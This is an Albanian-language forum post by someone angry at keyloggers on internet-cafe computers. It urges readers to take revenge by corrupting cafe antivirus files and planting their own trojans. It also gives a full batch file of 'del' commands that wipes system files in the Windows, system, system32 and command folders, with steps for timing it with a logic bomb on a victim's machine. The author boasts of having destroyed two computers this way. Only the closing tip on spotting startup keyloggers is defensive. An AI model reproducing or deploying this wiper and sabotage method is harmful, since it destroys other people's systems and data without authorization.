Pershendetje Grupi ... jam bere shume nervoz me dicka qe tani nuk eshte e re per ju, sepse te gjithe e kemi permendur disa here ketu. E kam fjalen per keyloggerat apo edhe RAT-et (Remote Administration Tool) neper Internet Kafe, qe kohet e fundit jane shtuar si mizat ne bajga. Kete e vura kur mu desh te hyja ne linje per dicka urgjente. Mirepo kur i hedh nje sy kot listes startup, c'te shikoj... ne krye rrinte keyloggeri te cilit nuk kishin marre mundimin ti ndryshonin as emrin. I thashe robit qe punonte aty te nderroja kompjuter, dhe kur me pyeti "Pse ?" i thashe qe e kishte te infektuar. Ai me nje "aha" te thate , as nuk u habit fare, por me percolli tek nje tjeter ku CUDI???!!!....LoL na kishte edhe "TaskManger" edhe "TaskManager_". Hajde ne P.T.S. pra thashe dhe ika ne nje Kafe tjeter.
E njejta histori, kompjuteri ku u ula kete rradhe kishte KeyHooker (LoL) qe eshte po e njejta gje, edhe kesaj rradhe i instaluar nga vete Admini qe nuk e rruante fare.
Po mire o ja Q. M. ne s'jemi shqiptare e nuk na hipin nervat qe tja hysh ne shpulla e ti besh P. fare keta kucka? Po sikur te keni ndonje moter apo te dashur, apo edhe thjeshte shok qe keta Shk. ja lexojne mailet. Sinqerisht eshte bere problem i madh, i gjere dhe i bezdisshem. Njerezit i paguajne para (shume here mbi 200 lek ora) ketyre BQ-rave per gallate me adresat e tyre apo cfare ? Nejse... ja tani shpejt e shpejt per ju zgjidhjet me "doreze mendafshi" dhe me "grusht te hekurt" :
1. DOREZA E MENDAFSHIT
Po e quaj ndryshe edhe metoda "pģēkė dhie". Asgje qe mund tju duket e re : filloni te azhurnoheni ne rrjet per keyloggerat apo trojanet e fundit. Shkoni ne nje internet kafe, demtoni ose prishni skedaret definicion ose dat te antiviruseve (beni praktike ne shtepi per kete, normalisht ata qe punojne aty si sylesha qe jane do ta vene re problemin pas nja 48 oresh) dhe pastaj infektojini internet kafete me serverat tuaj. Mbase do te ndjeheni me mire tani qe edhe ju keni mundesine te lexoni emailet e te tjereve. Por kjo nuk ju ben me te mire se ata BQ-ra.. prandaj ja dicka me delikate.... Ta zeme se keni username dha password te njerit, psh : cupido13@hotmail.com dhe pass : kozanostra (LoL nuk eshte reale). Cojini nje email ketij personi duke i treguar qe e dini passin e tij dhe qe nga filan internet kafe ja lexojne te gjitha mailet (mund te perdorni titullin e ndonje emaili ne inboxin e tij ndaj te cilit ai do te ishte vecanerisht i ndjeshem).
Me pak fat do ta futnit ne sherr te keq me klientet ate qe administron I-Kafene.
Po meqe sot jam i nxehur keq ja edhe dicka me e hidhur qe mund te beni e tipit "Kill The System" qe po e prezantoj me poshte si...
2. GRUSHTI I HEKURT
Metode e thjeshte teorikisht, e cila mund te permblidhet shkurtimisht "SHKAPERDHE WINDOWS-in".
Ju duhen dy gjera te vogla me te cilat mund ta beni kete pune qete fare dhe pa u rrezikuar :
a) Nje LogicBomb
b) Nje skedat .bat
Per ata qe nuk e kane degjuar ndonjehere, LogicBomb bombat llogjike jane ca programe te vogla fare e te thjeshta. Nje "bombe" e tille faktikisht nuk ben gje tjeter vecse ekzekuton nje (a me shume njekohesisht) skedar te caktuar nga ju ne kohen qe deshironi ju. Ajo perdoret shume thjeshte, mjafton qe te shkruani ne vendet e caktuara emrin e skedareve qe deshironi te ekzekutoni (ose edhe te fshini sepse e kane edhe kete opsion) dhe oren ne te cilen deshironi qe bomba logjike ta beje kete gje.
Skedaret bat (batch files) i keni pare edhe ca here ketu ne forum nga **** qe i kane prezantuar si viruse apo qe ju kane thene ti beni rename ne .bat dhe pastaj ti ekzekutoni e ku di une. Nejse ja shkurtimisht se cfare jane skedaret .bat (vetem esencen qe ju duhet per ketu, perdorimi i .bat mund te shtrihet edhe ne networking apo assembly etj.) :
Skedaret .bat, jane komanda DOS-i te parapergatitura ne forme llogjike. Ju mund te ndertoni nje skedar .bat duke perdorur Note Pad dhe me pas me Save As ta ruani psh "tralala.bat" (jo ".txt").
Me pare (por edhe tani) hacker-at i perdornin skedaret .bat per tu mbrojtur, duke i programuar keta per te fshire gjithshka qe nuk deshironin tju kapej ne kohe rekord (jo nuk do te ishte me kollaj formati mendohu pse). Qe ta kuptoni me mire le te marrim nje shembull e te ndertojme nje skedar bat tani.
I mbani mend komandat baze te DOS-it? Pershembull :
cd = Nderro direktori; ben te mundur levizjen nga nje direktori ne nje tjeter.
del = Fshi skedar
ren = ndrysho emrin e skedarit apo
copy = kopjo skedarin.
Ketu do te na duhet vetem "cd" dhe "del" .
Hapni nje direktori te re ne Desktop , psh me emrin 123. Kopjoni pastaj brenda kesaj direktori skedare te ndryshem psh Wordi/Teksti (.doc .txt), foto (.bmp .jpg .gif .jpeg) , muzike (.mp3) , filma (.avi .mpeg) apo edhe skedare sistemi (.sys .dll .exe) etj.
Tani le te hapim NotePad dhe te ndertojme skedarin .bat qe do ti fshije. Shkruajme :
cd\windows\desktop\123\ (me kete i tregojme interpretuesit te komandave se ku jane skedaret qe do te fshije, pra ne direktorine 123)
del *.doc
del *.txt
del *.bmp
del *.jpg
del *.jpeg
del *.gif
del *.mp3
del *.mpeg
del *.avi
del *.sys
del *.dll
del *.exe
Tani ne i kerkojme te fshije te gjithe skedaret .doc, te gjithe skedaret .txt, te gjtha kenget .mp3 e keshtu me rradhe. Shenja " * " dmth "te gjitha". (Jo , nuk do te ishte ide e mire te perdornit *.* ... vriteni mendjen pse?) Perfundimisht ja se si do te ishte nje skedar bat qe do te shkaterronte sistemin :
del *.sys
del *.com
del *.exe
del *.dll
del *.ini
del *.log
del *.dat
del *.bat
del *.txt
cd\windows\system\
del *.sys
del *.com
del *.exe
del *.dll
del *.ini
del *.log
del *.dat
del *.bat
del *.txt
cd\windows\system32\
del *.sys
del *.com
del *.exe
del *.dll
del *.ini
del *.log
del *.dat
del *.bat
del *.txt
cd\windows\command\
del *.sys
del *.com
del *.exe
del *.dll
del *.ini
del *.log
del *.dat
del *.bat
del *.txt
Ruajeni me Save As kete skedar si psh. : vrases.bat POR KUJDES, MOS E EKZEKUTONI NE KOMPJUTERIN TUAJ SEPSE DO TA CONTE PER LESH.
Jam i sigurte se tani e kuptuat se cfare po bejme. I kopjojme me diskete bomben llogjike dhe skedarin vrases.bat ne direktorine c:\windows te kompjuterit viktime, hapim bomben llogjike dhe e "kurdisim" qe pas nja 3 oresh te ekzekutoje skedarin vrases.bat. Keshtu qe pa qene fare ju aty , ne kohen e caktuar... BUUUUM ! Kete BUUUM e kane degjuar 2 kompjutera ne 2 vende te ndryshme deri tani LoL. Keta plehra keshtu e meritojne !
Kaq kisha dhe shiko cfare gjerash vari ****** prezantova.
Oh, se per pak harrova... Keto lloj pislleqesh sado te fshehta te jene dallohen lehtesisht. Mjafton te shkoni tek Start-Run dhe te shkruani : msconfig. Nen tab-in me emer Start Up do te gjeni listen e programeve qe aktivizohen me ngarkimin e Windowsit. Natyrisht qe nqs nuk ja keni haberin listes normale nuk keni mundesi te dalloni ate qe nuk shkon. Hidhini nje sy listes se nje kompjuteri te rregullt dhe do te arrini te dalloni menjehere exe-te qe nuk jane klasike. Meqe ra fjala komanda msconfig vlen per sistemet 9x (te cilet perbejne edhe shumicen e kompjuterave ne I-cafe) ..per 2000-shat nuk po me vjen ne mendje gjalle, kujt ti vije le ta thote..
Nejse. . kerkoj falje per gjuhen qe kam perdorur por kur gjerat duhen thene .. duhen thene sic jane. KESHILLA FINALE : Nqs keni punuar ne int-kafe se fundmi, per merak shkoni ne nje PC te sigurte dhe ndryshoni te gjithe password-et.
Hajde gjithe te mirat...
Krijoni Kontakt